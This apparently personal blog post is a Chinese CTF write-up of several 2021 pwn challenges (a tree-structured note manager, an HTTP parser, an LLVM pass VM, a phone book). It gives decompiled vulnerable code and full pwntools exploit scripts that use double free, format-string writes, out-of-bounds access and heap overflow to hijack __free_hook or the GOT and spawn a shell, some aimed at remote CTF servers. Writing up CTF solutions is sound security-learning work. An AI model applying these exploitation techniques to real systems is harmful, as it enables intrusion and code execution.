2021-红帽杯线上\津门杯线上线下\虎符线下题解

2021-05-30

字数统计: 7.3k字 | 阅读时长≈ 40分

前段时间一直在学RealWorld相关的知识，对于近两个月做的比赛和题还没有进行整理。这里整理一下，主要包含红帽杯线上、津门杯线上和线下题解。

2021-红帽杯

manager

程序分析

程序总体实现了一个双子树链表结构，会将比当前结点size大的结点插入右子树，比当前结点size小的结点插入左子树：

00000000 node            struc ; (sizeof=0x30, mappedto_8)
00000000 left_pt         dq ?
00000008 right_pt        dq ?
00000010 size1           dq ?
00000018 data_chunk      dq ?

删除的时候，需要遍历左右子树，先找到size刚好必要删除node的 size大的结点。原本算法是需要将这个找到的结点用来替换要被删除的结点。但是这里存在漏洞，先将找到的node的 data_chunk进行了删除，然后又将要删除的 node用找到的Node进行了更新，最后还会将这个node删除一次，也就是存在一个 double free漏洞：

node *__fastcall sub_C00(void ***right_chunk1, int size)
{
  node *chunk_strcut; // rbx
  node *org_chunk; // rdx
  node *result; // rax
  node *right_chunk; // rcx
  node *i; // rbp

  chunk_strcut = (node *)*right_chunk1;
  if ( !*right_chunk1 )
    return 0LL;
  while ( 2 )
  {
    org_chunk = 0LL;
    while ( 1 )
    {
      if ( SLODWORD(chunk_strcut->size1) < size )
      {
        result = (node *)chunk_strcut->right_pt;// size大，往右子树遍历
        goto LABEL_4;
      }
      result = (node *)chunk_strcut->left_pt;   // 否则，往左子树遍历
      if ( SLODWORD(chunk_strcut->size1) <= size )// 找到，退出
        break;
LABEL_4:
      org_chunk = chunk_strcut;
      if ( !result )
        return result;
      chunk_strcut = result;
    }
    right_chunk = (node *)chunk_strcut->right_pt;
    if ( result )
    {
      if ( right_chunk )
      {
        for ( i = (node *)chunk_strcut->right_pt; i->left_pt; i = (node *)i->left_pt )
          ;
        LODWORD(chunk_strcut->size1) = i->size1;
        if ( i != right_chunk )
        {
          free((void *)i->data_chunk);          // free one
          right_chunk = (node *)chunk_strcut->right_pt;
        }
        right_chunk1 = (void ***)&chunk_strcut->right_pt;
        chunk_strcut = right_chunk;
        size = i->size1;
        if ( !right_chunk )
          return 0LL;
        continue;
      }
      if ( org_chunk )
      {
        if ( (node *)org_chunk->left_pt == chunk_strcut )
          org_chunk->left_pt = (__int64)result;
        else
          org_chunk->right_pt = (__int64)result;
      }
      else
      {
        *right_chunk1 = (void **)result;
      }
    }
    else if ( org_chunk )
    {
      if ( (node *)org_chunk->left_pt == chunk_strcut )
        org_chunk->left_pt = (__int64)right_chunk;
      else
        org_chunk->right_pt = (__int64)right_chunk;
    }
    else
    {
      *right_chunk1 = (void **)right_chunk;
    }
    break;
  }
  free(chunk_strcut);                           // double_free
  free((void *)chunk_strcut->data_chunk);
  return (node *)(&dword_0 + 1);
}

利用分析

2.27下的 double free利用很简单。首先填满 tcache，将一个node放到 unsortedbin来泄露地址。然后tcache构造一个 double free，最后来劫持 free_hook。

EXP

from pwn import *
context.update(arch='amd64',os='linux',log_level='debug')
context.terminal=(['tmux','split', '-h'])

file_name = './chall'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 0
if debug ==1 :
    p = process(file_name)
    elf = ELF(file_name)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    p = remote('47.105.94.48', 12243)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    #libc = ELF('./libc-2.27.so')
    elf = ELF(file_name)

def Insert(key, len, content):
    p.sendlineafter("> ",'1')
    p.sendlineafter("key> ",str(key))
    p.sendlineafter("len> ",str(len))
    p.sendafter("content> ",content)

def Delete(key):
    p.sendlineafter("> ", '2')
    p.sendlineafter("key> ", str(key))

def Show():
    p.sendlineafter("> ", '3')

def Pwn():
    Insert(102, 0x400, '1111')
    Insert(101, 0x400, '1111')
    Insert(104, 0x400, '1111')
    Insert(103, 0x400, '1111')
    Insert(105, 0x400, '1111')

    #full tcache
    Insert(11, 0x400, '1111')
    Insert(10, 0x400, '1111')
    Insert(12, 0x400, '1111')
    Insert(13, 0x400, '1111')
    Insert(14, 0x400, '1111')
    Insert(15, 0x400, '1111')
    Insert(16, 0x400, '1111')

    #gdb.attach(p, 'bp $rebase(0x902)')
    Delete(10)
    Delete(11)
    Delete(12)
    Delete(13)
    Delete(14)
    Delete(15)

    #gdb.attach(p, 'bp $rebase(0x902)')
    print("=== double free")
    Delete(102)

    Insert(55, 0x400, '\xa0')
    Show()
    p.recvuntil("55 content:")
    libc_base = u64(p.recvuntil("\n")[:-1].ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
    print("libc:", hex(libc_base))

    Insert(54, 0x100, 'aaaa')
    Delete(54)
    Delete(55)
    free_hook = libc_base + libc.sym['__free_hook']
    system_addr = libc_base + libc.sym['system']
    print("system_addr:",hex(system_addr))

    #Insert(5, 0x200, p64(free_hook))
    Insert(55, 0x100, p64(free_hook))

    Insert(54, 0x100, '2222')
    Insert(53, 0x100, p64(system_addr))

    Insert(56, 0x110, '/bin/sh')
    Delete(56)

    p.interactive()

Pwn()

parse

程序分析

__int64 __fastcall parse(const char *buf, _BYTE *buf2, int a3)
{
  const char *buf1; // rax
  const char *buf11; // rax
  char *v6; // rax
  char *v7; // rax
  char *v8; // rax
  char *v9; // rax
  char *buf_space; // [rsp+18h] [rbp-28h]
  char *v12; // [rsp+18h] [rbp-28h]
  char *v13; // [rsp+18h] [rbp-28h]
  char *v14; // [rsp+18h] [rbp-28h]
  char *v15; // [rsp+18h] [rbp-28h]
  char *v16; // [rsp+18h] [rbp-28h]
  char *v17; // [rsp+18h] [rbp-28h]
  char *v18; // [rsp+18h] [rbp-28h]
  char *i; // [rsp+18h] [rbp-28h]
  char *v20; // [rsp+18h] [rbp-28h]
  int packet_type; // [rsp+20h] [rbp-20h]
  int v22; // [rsp+24h] [rbp-1Ch]
  _BOOL4 v23; // [rsp+28h] [rbp-18h]
  int v24; // [rsp+2Ch] [rbp-14h]
  const char **v25; // [rsp+30h] [rbp-10h]

  if ( a3 != 1 && a3 != 2 )
    return 0xFFFFFFFFLL;
  memset(buf2, 0, 0x140uLL);
  *buf2 = a3;
  if ( a3 == 1 )
    buf1 = buf;
  else
    buf1 = 0LL;
  *((_QWORD *)buf2 + 1) = buf1;
  if ( a3 == 2 )
    buf11 = buf;
  else
    buf11 = 0LL;
  *((_QWORD *)buf2 + 3) = buf11;
  buf_space = strchr(buf, ' ');
  if ( !buf_space )
    return 400LL;
  *buf_space = 0;
  v12 = buf_space + 1;
  packet_type = 0;
  if ( a3 == 1 )
  {
    if ( !strcmp("GET", *((const char **)buf2 + 1)) )
      packet_type = 4;
    if ( !packet_type && !strcmp("HEAD", *((const char **)buf2 + 1)) )
      packet_type = 5;
    if ( !packet_type && !strcmp("POST", *((const char **)buf2 + 1)) )
      packet_type = 5;
    if ( !packet_type && !strcmp("PUT", *((const char **)buf2 + 1)) )
      packet_type = 4;
    if ( !packet_type && !strcmp("DELETE", *((const char **)buf2 + 1)) )
      packet_type = 7;
    if ( !packet_type && !strcmp("TRACE", *((const char **)buf2 + 1)) )
      packet_type = 6;
    if ( !packet_type && !strcmp("OPTIONS", *((const char **)buf2 + 1)) )
      packet_type = 8;
    if ( !packet_type && !strcmp("CONNECT", *((const char **)buf2 + 1)) )
      packet_type = 8;
    if ( !packet_type && !strcmp("PATCH", *((const char **)buf2 + 1)) )
      packet_type = 6;
    if ( !packet_type )
      return 400LL;
  }
  else if ( !strcmp("HTTP/1.0", *((const char **)buf2 + 3)) && !strcmp("HTTP/1.1", *((const char **)buf2 + 3)) )
  {
    return 400LL;
  }
  if ( a3 == 1 )
    v6 = v12;
  else
    v6 = 0LL;
  *((_QWORD *)buf2 + 2) = v6;
  if ( a3 == 2 )
    v7 = v12;
  else
    v7 = 0LL;
  *((_QWORD *)buf2 + 4) = v7;
  v13 = strchr(v12, ' ');
  if ( !v13 )
    return 414LL;
  *v13 = 0;
  v14 = v13 + 1;
  if ( a3 == 1 && strchr(*((const char **)buf2 + 2), '/') != *((char **)buf2 + 2) )
    return 400LL;
  if ( a3 == 2 && !atoi(*((const char **)buf2 + 4)) )
    return 400LL;
  if ( a3 == 1 )
    v8 = v14;
  else
    v8 = (char *)*((_QWORD *)buf2 + 3);
  *((_QWORD *)buf2 + 3) = v8;
  if ( a3 == 2 )
    v9 = v14;
  else
    v9 = 0LL;
  *((_QWORD *)buf2 + 5) = v9;
  v15 = strchr(v14, 10);
  if ( !v15 )
    return 400LL;
  *v15 = 0;
  v16 = v15 + 1;
  if ( *v16 == 13 )
    *v16++ = 0;
  v22 = 0;
  if ( a3 == 1 && !strcmp("HTTP/1.0", *((const char **)buf2 + 3)) && !strcmp("HTTP/1.1", *((const char **)buf2 + 3)) )
    return 400LL;
  v23 = 0;
  v24 = 0;
  while ( !*v16 || *v16 != '\n' && (*v16 != '\r' || v16[1] != '\n') )
  {
    if ( v24 <= 15 )
      *(_QWORD *)&buf2[16 * v24 + 48] = v16;
    v18 = strchr(v16, ':');
    if ( !v18 )
      return 413LL;
    *v18 = 0;
    for ( i = v18 + 1; *i && (*i == ' ' || *i == '\r' || *i == '\n' || *i == '\t'); ++i )
      *i = 0;
    if ( !*i )
      return 413LL;
    if ( v24 <= 15 )
      *(_QWORD *)&buf2[16 * v24 + 56] = i;
    v20 = strchr(i, '\n');
    if ( !v20 )
      return 413LL;
    *v20 = 0;
    v16 = v20 + 1;
    if ( *v16 == '\r' )
      *v16++ = 0;
    v25 = (const char **)&buf2[16 * v24 + 48];
    if ( a3 == 1 )
    {
      if ( !strcasecmp("Connection", *v25) )
      {
        if ( *(_BYTE *)(*((_QWORD *)buf2 + 3) + 7LL) == 0x30 && !strcasecmp("Keep-Alive", v25[1]) )
        {
          buf2[313] = 1;
        }
        else if ( *(_BYTE *)(*((_QWORD *)buf2 + 3) + 7LL) == 0x31 && !strcasecmp("Close", v25[1]) )
        {
          buf2[313] = 0;
        }
        buf2[312] = buf2[313] == 0;
      }
      if ( !strcasecmp("Accept-Encoding", *v25) && strstr(v25[1], "gzip") )
        buf2[314] = 1;
      if ( !strcasecmp("Content-Length", *v25) )
        v22 = atoi(v25[1]);
      if ( !v23 )
        v23 = strcasecmp("Host", *v25) == 0;
    }
    ++v24;
  }
  *v16 = 0;
  v17 = v16 + 1;
  if ( *v17 == '\n' )
    *v17++ = 0;
  if ( a3 != 1 )
    goto LABEL_126;
  if ( !buf2[313] && !buf2[312] )
  {
    buf2[313] = *(_BYTE *)(*((_QWORD *)buf2 + 3) + 7LL) != 0x30;
    buf2[312] = buf2[313] == 0;
  }
  if ( *(_BYTE *)(*((_QWORD *)buf2 + 3) + 7LL) == '1' && !v23 )
    return 400LL;
LABEL_126:
  *((_QWORD *)buf2 + 38) = v17;
  if ( v22 < 0 )
    printf(*((const char **)buf2 + 38));	//格式化字符串漏洞
  return 0LL;
}

程序基本模拟了一个 http包头的解析器，如果通过各种检测后，在最后会将报文通过Printf输出，这里就存在一个格式化字符串漏洞。

利用分析

利用格式化字符串来泄露地址，数据。然后修改紧邻main函数返回地址的 libc_start_main函数。

这里记录一下，格式化字符串实现任意地址写时: %numc%off$hn，这里的 num是输出的字符个数，如果在这个格式化字符前面还有字符，需要减去前面的字符数。

如果多次使用任意地址写，第二次写时需要减去前面输出的总字符。

EXP

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'split', '-h'])

file_name = './chall'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 1
if debug == 1:
    p = process(file_name)
    elf = ELF(file_name)
    libc = ELF(libcname)
else:
    p = remote()
    libc = ELF('./libc.so.6')
gadgets = [0x4f365, 0x4f3c2, 0x10a45c]
def Pwn():
    payload = 'POST / HTTP/1.1\nContent-Length:-1\r\nHost:www.a1ex.online\r\n\r\n'
    payload += "plt:%15$p\nstack:%8$p\n"
    gdb.attach(p)
    p.sendlineafter("> ", payload)
    p.recvuntil('plt:')
    plt_addr = int(p.recvuntil('\n', drop=True), 16)-0x14a8
    p.recvuntil('stack:')
    stack_addr = int(p.recvuntil('\n', drop=True), 16)
    print('plt_addr:',hex(plt_addr),hex(stack_addr))

    puts_got = elf.got['atoi']+plt_addr
    print('puts_got:',hex(puts_got))
    payload = 'POST / HTTP/1.1\nContent-Length:-1\r\nHost:www.a1ex.online\r\n\r\n'
    payload += 'a'*5+"%25$s"+"b"*3+p64(puts_got)
    p.sendlineafter("> ", payload)
    p.recvuntil('a'*5)
    atoi_addr = u64(p.recv(6).ljust(8, b'\x00'))
    libc_base = atoi_addr-libc.sym['atoi']
    print('libc_base:',hex(libc_base))
    gadget = gadgets[0]+libc_base
    ret_addr = stack_addr+0x5a8

    lowAddr = gadget & 0xffffffff
    highAddr = gadget >> 32
    addr1 = lowAddr & 0xffff
    addr2 = lowAddr >> 16
    addr3 = highAddr

    print('gadget:',hex(gadget))
    payload1 = 'POST / HTTP/1.1\nContent-Length:-1\r\nHost:w\r\n\r\n'
    payload1 += 'a'*5
    len1 = len(payload1)
    print('len1:',hex(len1))
    payload = "%" + str(addr1 - len1+0x30 - 3) + "c%27$hn"
    # payload = payload.ljust(0x30, '\x00')
    payload += 'b'*25+p64(ret_addr)
    payload1 += payload
    p.sendlineafter("> ", payload1)


    payload1 = 'POST / HTTP/1.1\nContent-Length:-1\r\nHost:w\r\n\r\n'
    payload1 += 'a'*5
    payload = "%" + str(addr2 - len1+0x30 - 3) + "c%27$hn"
    # payload = payload.ljust(0x30, '\x00')
    payload += 'b'*25+p64(ret_addr+2)
    payload1 += payload
    p.sendlineafter("> ", payload1)

    payload1 = 'POST / HTTP/1.1\nContent-Length:1\r\n\r\nHost:w\r\n\r\n'
    payload1 += 'a'*5
    payload = "%" + str(addr2 - 27 - 3) + "c%30$x"
    # payload = payload.ljust(0x30, '\x00')
    payload += p64(ret_addr+2)
    payload1 += payload
    p.sendlineafter("> ", payload1)

    p.interactive()

Pwn()

SimpleVM

这道题是这次红帽杯让我感觉很有意思的一道题，以前对LLVM也一点都不了解。

基础知识

LLVM PASS

Pass就是遍历一遍IR，同时对它做一些操作。LLVM的核心库中会给你一些pass类去继承，我们需要实现它的一些方法，最后使用 LLVM的编译器会把它翻译得到的 IR传入 Pass里，给你遍历和修改。

LLVM Pass的作用：

进行插装，在 pass遍历LLVM IR的同时，自然就可以往里面插入新的代码
机器无关的代码优化：IR在被翻译成机器码前会做一些机器无关的优化，但是不同的优化方法之间需要解耦，所以自然要各自遍历一遍IR，实现成了一个个LLVM Pass，最终，基于 LLVM的编译器会在前端生成 LLVM IR后调用一些LLVM Pass做机器无关优化，然后再调用LLVM后端生成目标平台代码

LLVM IR

传给LLVM PASS进行优化的数据是 LLVM IR，即代码的中间表示，LLVM IR有三种形式：

1
2
3

1、.ll 格式：人类可以阅读的文本。
2、.bc 格式：适合机器存储的二进制文件。
3、内存表示

从对应格式转化到另一格式命令如下：

.c -> .ll：clang -emit-llvm -S a.c -o a.ll
.c -> .bc: clang -emit-llvm -c a.c -o a.bc
.ll -> .bc: llvm-as a.ll -o a.bc
.bc -> .ll: llvm-dis a.bc -o a.ll
.bc -> .s: llc a.bc -o a.s

对于一个示例程序：

#include <stdio.h>
#include <unistd.h>

int main() {
   char name[0x10];
   read(0,name,0x10);
   write(1,name,0x10);
   printf("bye\n");
}

通过命令：

1	clang -emit-llvm -S main.c -o main.ll

可以生成IR文本文件：

; ModuleID = 'main.c'
source_filename = "main.c"
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"

@.str = private unnamed_addr constant [5 x i8] c"bye\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define i32 @main() #0 {
  %1 = alloca [16 x i8], align 16
  %2 = getelementptr inbounds [16 x i8], [16 x i8]* %1, i32 0, i32 0
  %3 = call i64 @read(i32 0, i8* %2, i64 16)
  %4 = getelementptr inbounds [16 x i8], [16 x i8]* %1, i32 0, i32 0
  %5 = call i64 @write(i32 1, i8* %4, i64 16)
  %6 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str, i32 0, i32 0))
  ret i32 0
}

declare i64 @read(i32, i8*, i64) #1

declare i64 @write(i32, i8*, i64) #1

declare i32 @printf(i8*, ...) #1

attributes #0 = { noinline nounwind optnone uwtable "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "no-frame-pointer-elim"="true" "no-frame-pointer-elim-non-leaf" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }
attributes #1 = { "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "no-frame-pointer-elim"="true" "no-frame-pointer-elim-non-leaf" "no-infs-fp-math"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }

!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 6.0.0-1ubuntu2 (tags/RELEASE_600/final)"}

从中可以看到 IR中间代码表示的非常直观，而 LLVM PASS就是用于处理 IR，将一些能够优化掉的语句进行优化。

编写一个LLVM Pass

如果要编写一个 LLVM Pass，示例如下：

#include "llvm/Pass.h"
#include "llvm/IR/Function.h"
#include "llvm/Support/raw_ostream.h"
#include "llvm/IR/LegacyPassManager.h"
#include "llvm/Transforms/IPO/PassManagerBuilder.h"

using namespace llvm;

namespace {
  struct Hello : public FunctionPass {
    static char ID;
    Hello() : FunctionPass(ID) {}
    bool runOnFunction(Function &F) override {
      errs() << "Hello: ";
      errs().write_escaped(F.getName()) << '\n';
      return false;
    }
  };
}

char Hello::ID = 0;

// Register for opt
static RegisterPass<Hello> X("hello", "Hello World Pass");

// Register for clang
static RegisterStandardPasses Y(PassManagerBuilder::EP_EarlyAsPossible,
  [](const PassManagerBuilder &Builder, legacy::PassManagerBase &PM) {
    PM.add(new Hello());
  });

该示例用于遍历 IR中的函数，因此结构体 hello继承了 FunctionPass，并重写了 runOnFunction函数，那么每遍历到一个函数时，runOnFunction都会被调用，因此该程序会输出函数名。为了测试，需要将其编译为模块：

1	clang `llvm-config --cxxflags` -Wl,-znodelete -fno-rtti -fPIC -shared Hello.cpp -o LLVMHello.so `llvm-config --ldflags`

逆向分析

这里重点说一下如何对 LLVM Pass进行逆向。在初始化函数中，调用 start：

int start()
{
  int v1; // [rsp+18h] [rbp-68h]
  int v2; // [rsp+28h] [rbp-58h]

  if ( "VMPass" )
    v2 = strlen("VMPass");
  else
    v2 = 0;
  if ( "VMPass" )
    v1 = strlen("VMPass");
  else
    v1 = 0;
  sub_6510((unsigned int)&unk_20E990, (unsigned int)"VMPass", v2, (unsigned int)"VMPass", v1, 0, 0);	//初始化函数
  return __cxa_atexit(func, &unk_20E990, &off_20E548);
}

在 start函数中，回去注册相应的处理函数：

unsigned __int64 __fastcall sub_6510(llvm::PassRegistry *a1, int a2, int a3, int a4, int a5, char a6, char a7)
{
  llvm::PassRegistry *v8; // [rsp+18h] [rbp-98h]

  llvm::PassInfo::PassInfo((_DWORD)a1, a4, a5, a2, a3, (unsigned int)byte_20E9E0, (__int64)func_list, a6 & 1, a7 & 1);
  v8 = (llvm::PassRegistry *)llvm::PassRegistry::getPassRegistry(a1);
  llvm::PassRegistry::registerPass(v8, a1, 0);
  return __readfsqword(0x28u);
}

这里再去看 funclist：

unsigned __int64 __fastcall sub_6720(llvm::FunctionPass *a1)
{
  llvm::FunctionPass::FunctionPass(a1, var1);
  *(_QWORD *)a1 = funclist;
  return __readfsqword(0x28u);
}

LOAD:000000000020DD20 funclist        dq offset sub_6780      ; DATA XREF: sub_6720+30↑o
LOAD:000000000020DD28                 dq offset sub_67D0
LOAD:000000000020DD30                 dq offset _ZNK4llvm4Pass11getPassNameEv ; llvm::Pass::getPassName(void)
LOAD:000000000020DD38                 dq offset _ZN4llvm4Pass16doInitializationERNS_6ModuleE ; llvm::Pass::doInitialization(llvm::Module &)
LOAD:000000000020DD40                 dq offset _ZN4llvm4Pass14doFinalizationERNS_6ModuleE ; llvm::Pass::doFinalization(llvm::Module &)
LOAD:000000000020DD48                 dq offset _ZNK4llvm4Pass5printERNS_11raw_ostreamEPKNS_6ModuleE ; llvm::Pass::print(llvm::raw_ostream &,llvm::Module const*)
LOAD:000000000020DD50                 dq offset _ZNK4llvm12FunctionPass17createPrinterPassERNS_11raw_ostreamERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE ; llvm::FunctionPass::createPrinterPass(llvm::raw_ostream &,std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>> const&)
LOAD:000000000020DD58                 dq offset _ZN4llvm12FunctionPass17assignPassManagerERNS_7PMStackENS_15PassManagerTypeE ; llvm::FunctionPass::assignPassManager(llvm::PMStack &,llvm::PassManagerType)
LOAD:000000000020DD60                 dq offset _ZN4llvm4Pass18preparePassManagerERNS_7PMStackE ; llvm::Pass::preparePassManager(llvm::PMStack &)
LOAD:000000000020DD68                 dq offset _ZNK4llvm12FunctionPass27getPotentialPassManagerTypeEv ; llvm::FunctionPass::getPotentialPassManagerType(void)
LOAD:000000000020DD70                 dq offset _ZNK4llvm4Pass16getAnalysisUsageERNS_13AnalysisUsageE ; llvm::Pass::getAnalysisUsage(llvm::AnalysisUsage &)
LOAD:000000000020DD78                 dq offset _ZN4llvm4Pass13releaseMemoryEv ; llvm::Pass::releaseMemory(void)
LOAD:000000000020DD80                 dq offset _ZN4llvm4Pass26getAdjustedAnalysisPointerEPKv ; llvm::Pass::getAdjustedAnalysisPointer(void const*)
LOAD:000000000020DD88                 dq offset _ZN4llvm4Pass18getAsImmutablePassEv ; llvm::Pass::getAsImmutablePass(void)
LOAD:000000000020DD90                 dq offset _ZN4llvm4Pass18getAsPMDataManagerEv ; llvm::Pass::getAsPMDataManager(void)
LOAD:000000000020DD98                 dq offset _ZNK4llvm4Pass14verifyAnalysisEv ; llvm::Pass::verifyAnalysis(void)
LOAD:000000000020DDA0                 dq offset _ZN4llvm4Pass17dumpPassStructureEj ; llvm::Pass::dumpPassStructure(uint)
LOAD:000000000020DDA8                 dq offset runOnFunction	//runOnFunction

然后重点就是分析 runOnFunction里的函数处理流程。

程序分析

__int64 __fastcall runOnFunction(__int64 a1, llvm::Value *a2)
{
  __int64 v2; // rdx
  bool v4; // [rsp+7h] [rbp-119h]
  size_t v5; // [rsp+10h] [rbp-110h]
  const void *v6; // [rsp+28h] [rbp-F8h]
  __int64 v7; // [rsp+30h] [rbp-F0h]
  int v8; // [rsp+94h] [rbp-8Ch]

  v6 = (const void *)llvm::Value::getName(a2);
  v7 = v2;
  if ( "o0o0o0o0" )
    v5 = strlen("o0o0o0o0");
  else
    v5 = 0LL;
  v4 = 0;
  if ( v7 == v5 )
  {
    if ( v5 )
      v8 = memcmp(v6, "o0o0o0o0", v5);
    else
      v8 = 0;
    v4 = v8 == 0;
  }
  if ( v4 )
    sub_6AC0(a1, a2);
  return 0LL;
}

程序首先比较，函数名称是否叫 o0o0o0o0，然后会获取程序的每一个基本块。然后会将每个基本块的指令进行处理：

unsigned __int64 __fastcall sub_6AC0(__int64 a1, llvm::Function *a2)
{
  __int64 v3; // [rsp+20h] [rbp-30h]
  __int64 v4; // [rsp+38h] [rbp-18h] BYREF
  __int64 v5[2]; // [rsp+40h] [rbp-10h] BYREF

  v5[1] = __readfsqword(0x28u);
  v5[0] = llvm::Function::begin(a2);
  while ( 1 )                                   // 遍历基本块
  {
    v4 = llvm::Function::end(a2);
    if ( (llvm::operator!=(v5, &v4) & 1) == 0 )
      break;
    v3 = llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,false>::operator*(v5);
    funcs(a1, v3, 1LL);                         // 遍历基本块中的指令并处理
    llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,false>::operator++(
      v5,
      0LL);
  }
  return __readfsqword(0x28u);
}

else if ( !strcmp(chunk, "store") )
{
  if ( (unsigned int)llvm::CallBase::getNumOperands(v35) == 2 )
  {
    v25 = llvm::CallBase::getArgOperand(v35, 0);
    v24 = 0LL;
    v23 = (llvm::ConstantInt *)llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v25);
    if ( v23 )
    {
      v22 = llvm::ConstantInt::getZExtValue(v23);
      if ( v22 == 1 )
        v24 = tar;
      if ( v22 == 2 )
        v24 = src;
    }
    if ( v24 == tar )
    {
      **(_QWORD **)tar = *(_QWORD *)src;// [reg_1] = reg_2 
    }
    else if ( v24 == src )
    {
      **(_QWORD **)src = *(_QWORD *)tar;// [reg2] = reg1
    }
  }
}
else if ( !strcmp(chunk, "load") )
{
  if ( (unsigned int)llvm::CallBase::getNumOperands(v35) == 2 )
  {
    v21 = llvm::CallBase::getArgOperand(v35, 0);
    v20 = 0LL;
    v19 = (llvm::ConstantInt *)llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v21);
    if ( v19 )
    {
      v18 = llvm::ConstantInt::getZExtValue(v19);
      if ( v18 == 1 )
        v20 = tar;
      if ( v18 == 2 )
        v20 = src;
    }
    if ( v20 == tar )
      *(_QWORD *)src = **(_QWORD **)tar;// reg1 = [reg2]
    if ( v20 == src )
      *(_QWORD *)tar = **(_QWORD **)src;// reg2 = [reg1]
  }
}
else if ( !strcmp(chunk, "add") )
{
  if ( (unsigned int)llvm::CallBase::getNumOperands(v35) == 3 )
  {
    v17 = llvm::CallBase::getArgOperand(v35, 0);
    v16 = 0LL;
    v15 = (llvm::ConstantInt *)llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v17);
    if ( v15 )
    {
      v14 = llvm::ConstantInt::getZExtValue(v15);
      if ( v14 == 1 )
        v16 = tar;
      if ( v14 == 2 )
        v16 = src;
    }
    if ( v16 )
    {
      v13 = llvm::CallBase::getArgOperand(v35, 1u);
      v12 = (llvm::ConstantInt *)llvm::dyn_cast<llvm::ConstantInt,llvm::Value>(v13);
      if ( v12 )
        *v16 += llvm::ConstantInt::getZExtValue(v12);
    }
  }
}

这里就实现了一个 vm的操作，load是读取一个地址的值到寄存器中，store是将一个值写入一个地址。而这两个操作，都没有检查边界，所以存在越界读写。此外，add函数可以帮助我们将一个值加到一个地址的值上。

利用分析

而这里由于 opt没有开启 PIE和 got表保护。可以直接利用越界读写来修改 free@got为one_gadget，实现getshell

EXP

void store(int a);
void load(int a);
void add(int a, int b);

void o0o0o0o0(){
    add(1, 0x77e100);
    load(1);
    add(2, 0x729ec);
    store(1);
}

2021-津门杯线上

Hello

在 edit，读入 phone number和 name时，存在一个溢出，所以可以直接向下越界，修改chunk_list中 chunk地址为 free_hook，劫持 free_hook来 getshell。

from pwn import *
context.update(arch='amd64',os='linux',log_level='debug')
context.terminal=(['tmux','split', '-h'])

file_name = './hello'
libcname = file_name
debug = 0
if debug ==1 :
    p = process(file_name)
    elf = ELF(file_name)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    p = remote('119.3.81.43',49153)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    elf = ELF(file_name)

def Add(pn, name, size, info):
    p.sendlineafter('your choice>>', str(1))
    p.sendlineafter('phone number:', pn)
    p.sendlineafter('name:', name)
    p.sendlineafter(' des size:', str(size))
    p.sendafter('des info:', info)

def Delete(idx):
    p.sendlineafter('your choice>>', str(2))
    p.sendlineafter('input index:', str(idx))

def Show(idx):
    p.sendlineafter('your choice>>', str(3))
    p.sendlineafter('input index:', str(idx))

def Edit(idx, pn, name, info):
    p.sendlineafter('your choice>>', str(4))
    p.sendlineafter('input index:', str(idx))
    p.sendlineafter('phone number:', pn)
    p.sendlineafter('name:', name)
    p.sendlineafter('des info:', info)

gadgets = [0x45226,0x4527a,0xf0364,0xf1207]
def Pwn():
    #gdb.attach(p)
    Add('0000', 'a1ex', 0x80, 'a'*0x81)
    Add('1111', 'a1ex', 0x80, 'a'*0x81)
    Delete(0)
    Add('222', 'a1ex', 0x7, '/bin/sh;')
    Show(2)
    p.recvuntil('des:')
    libc_addr = u64(p.recvuntil('\n', drop=True)[-6:].ljust(8, b'\x00'))-0x80
    libc_base = libc_addr-88-0x10-libc.sym['__malloc_hook']
    print("libc_addr:",hex(libc_addr),hex(libc_base))
    malloc_hook = libc_base+libc.sym['__malloc_hook']
    free_hook = libc_base+libc.sym['__free_hook']
    system_addr = libc_base+libc.sym['system']

    gadget = gadgets[1]+libc_base
    print("gadget:",hex(gadget),hex(malloc_hook))

    #'a'*0x18
    Edit(1, 'a'*0x18+p64(free_hook),' a1ex', p64(system_addr))

    Delete(2)
    p.interactive()

Pwn()

Pwn3

程序分析

Add函数中使用 strcpy向堆块中拷贝数据，会向末尾多添加一个 \x00，所以存在一个 off-by-null漏洞。

利用分析

注意：这里很坑的一个点是，这道题远程是 glibc-2.27 1.4，也就是开启了 double free检测，而题目没给libc，一段时间比较自闭。

off-by-null的常见用法，申请两虚堆块3个，将chunk0放入 unsortedbin，使其满足合并时的 unlink检查。通过 chunk1修改相邻堆块chunk2的 inuse位和伪造一个 fake_prevsize。然后释放 chunk2，chunk2如果进入 unsortedbin，此时会产生堆块合并。

就能够复用 chunk1堆块。

EXP

from pwn import *
context.update(arch='amd64',os='linux',log_level='debug')
context.terminal=(['tmux','split', '-h'])

file_name = './pwn'
